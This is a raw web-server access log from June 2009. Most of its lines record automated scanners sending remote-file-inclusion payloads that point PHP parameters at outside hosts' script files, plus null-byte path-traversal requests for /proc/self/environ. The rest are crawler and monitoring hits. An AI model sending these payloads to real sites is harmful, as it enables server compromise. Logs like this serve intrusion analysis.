89.111.0.66 - - [12/Jun/2009:00:00:15 -0400] "GET /logs/access_log.Q109052900//ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:00:15 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:00:16 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
187.25.80.250 - - [12/Jun/2009:00:00:35 -0400] "GET /logs/access_log.Q109052500//components/errors.php?error=http://typh0n.awardspace.co.uk/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
217.125.38.117 - - [12/Jun/2009:00:01:11 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:00:01:12 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.125.38.117 - - [12/Jun/2009:00:01:13 -0400] "GET /logs/access_log.Q109050300%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:01:32 -0400] "GET /logs/access_log.Q109052200%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:01:35 -0400] "GET /logs/access_log.Q109052100%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:01:35 -0400] "GET /logs/access_log.Q109050300%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
199.120.90.222 - - [12/Jun/2009:00:01:36 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:01:37 -0400] "GET /logs/access_log.Q109052100%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:01:50 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:01:50 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
199.120.90.222 - - [12/Jun/2009:00:01:53 -0400] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:01:55 -0400] "GET /logs/access_log.Q109053000%20%20//includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:03:03 -0400] "GET /logs/access_log.Q109052100%20%20//includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:00:03:04 -0400] "GET /images/_notes/connect_anim2.gif.mno HTTP/1.0" 200 195 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.0.66 - - [12/Jun/2009:00:03:10 -0400] "GET /logs/access_log.Q109052900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:04:35 -0400] "GET /logs/access_log.Q109053000%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
110.45.144.89 - - [12/Jun/2009:00:04:53 -0400] "GET /logs/access_log.Q109052800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Jun/2009:00:05:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [12/Jun/2009:00:05:58 -0400] "GET /logs/access_log.Q109051800//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:05:58 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:06:12 -0400] "GET /logs/access_log.Q109051800//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:06:12 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:06:21 -0400] "GET /logs/access_log.Q109052700//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:06:22 -0400] "GET /logs/access_log.Q109051800//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:06:22 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:06:37 -0400] "GET /logs/access_log.Q109052700//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:06:50 -0400] "GET /logs/access_log.Q109052700//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
121.165.73.157 - - [12/Jun/2009:00:06:59 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:06:59 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
110.45.144.33 - - [12/Jun/2009:00:08:50 -0400] "GET /logs/access_log.Q109052800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
123.143.98.5 - - [12/Jun/2009:00:08:53 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:08:53 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:08:53 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:08:53 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:09:15 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:09:15 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:09:15 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:09:15 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:00:10:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [12/Jun/2009:00:10:29 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:00:11:05 -0400] "GET /logs/access_log.Q109052100//includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:00:11:10 -0400] "GET /logs/access_log.Q109051800//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
70.85.165.10 - - [12/Jun/2009:00:11:10 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
89.111.0.66 - - [12/Jun/2009:00:11:11 -0400] "GET /logs/access_log.Q109052200//includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
70.85.165.10 - - [12/Jun/2009:00:11:33 -0400] "GET /logs/access_log.Q109052700//index.php?_SERVER[DOCUMENT_ROOT]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
209.62.42.51 - - [12/Jun/2009:00:12:09 -0400] "GET /logs/errors.php?error=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:00:12:09 -0400] "GET /errors.php?error=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:00:12:09 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [12/Jun/2009:00:12:42 -0400] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [12/Jun/2009:00:12:42 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:13:43 -0400] "GET /logs/access_log.Q109052400/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:13:43 -0400] "GET /logs/access_log.Q109052100/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:00:13:52 -0400] "GET /images/logo_1.gif HTTP/1.1" 200 382 "-" "Googlebot-Image/1.0"
209.62.42.51 - - [12/Jun/2009:00:14:18 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:14:48 -0400] "GET /logs/access_log.Q109053100//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:00:14:48 -0400] "GET /logs/access_log.Q109060100//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:14:49 -0400] "GET /logs/access_log.Q109052100/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:00:14:49 -0400] "GET /logs/access_log.Q109052400/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:00:15:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.235.124.14 - - [12/Jun/2009:00:15:12 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
87.118.90.151 - - [12/Jun/2009:00:15:27 -0400] "GET /logs/access_log.Q109051000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
87.118.90.151 - - [12/Jun/2009:00:15:27 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
87.118.90.151 - - [12/Jun/2009:00:15:28 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
66.235.124.14 - - [12/Jun/2009:00:15:42 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):14+RNSUBS%20(S0040):0 HTTP/1.1" 200 58710 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
87.118.90.151 - - [12/Jun/2009:00:16:25 -0400] "GET /logs/error_log.Q109050800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.118.90.151 - - [12/Jun/2009:00:16:25 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
87.118.90.151 - - [12/Jun/2009:00:16:26 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
87.118.90.151 - - [12/Jun/2009:00:16:31 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
87.118.90.151 - - [12/Jun/2009:00:16:39 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
87.118.90.151 - - [12/Jun/2009:00:16:43 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
89.171.190.110 - - [12/Jun/2009:00:17:06 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
89.171.190.110 - - [12/Jun/2009:00:17:06 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
89.171.190.110 - - [12/Jun/2009:00:17:06 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
89.111.0.66 - - [12/Jun/2009:00:17:43 -0400] "GET /logs/access_log.Q109053000//ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Jun/2009:00:17:46 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Jun/2009:00:17:46 -0400] "GET /logs/access_log.Q109060500//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [12/Jun/2009:00:17:46 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
87.118.90.151 - - [12/Jun/2009:00:17:51 -0400] "GET /logs/access_log.Q109050700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
89.171.190.110 - - [12/Jun/2009:00:18:30 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
116.36.213.166 - - [12/Jun/2009:00:19:08 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
116.36.213.166 - - [12/Jun/2009:00:19:08 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
116.36.213.166 - - [12/Jun/2009:00:19:08 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
116.36.213.166 - - [12/Jun/2009:00:19:13 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
116.36.213.166 - - [12/Jun/2009:00:19:13 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
116.36.213.166 - - [12/Jun/2009:00:19:13 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
211.189.18.73 - - [12/Jun/2009:00:19:19 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:19:19 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:19:19 -0400] "GET /logs/access_log.Q109052400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:19:19 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:19:19 -0400] "GET /logs/access_log.Q109052400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:19:19 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.62.42.51 - - [12/Jun/2009:00:19:22 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:00:20:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.217.242.2 - - [12/Jun/2009:00:20:21 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:00:20:21 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:00:20:21 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:00:20:25 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:00:20:25 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:00:20:25 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
116.36.213.166 - - [12/Jun/2009:00:20:26 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
116.36.213.166 - - [12/Jun/2009:00:20:32 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://adresik.info//components/com_agora/perkosa.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
124.217.242.2 - - [12/Jun/2009:00:20:47 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
124.217.242.2 - - [12/Jun/2009:00:20:51 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.inboxstorage.nl/images/yes.txt%0D?? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
211.189.18.73 - - [12/Jun/2009:00:21:05 -0400] "GET /logs/access_log.Q109052400%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:00:21:13 -0400] "GET /logs/access_log.Q109052400%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:23:03 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:23:03 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:00:25:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [12/Jun/2009:00:25:29 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [12/Jun/2009:00:25:29 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.30.80 - - [12/Jun/2009:00:25:35 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
217.147.30.80 - - [12/Jun/2009:00:25:35 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
217.147.30.80 - - [12/Jun/2009:00:25:39 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
217.147.30.80 - - [12/Jun/2009:00:26:14 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
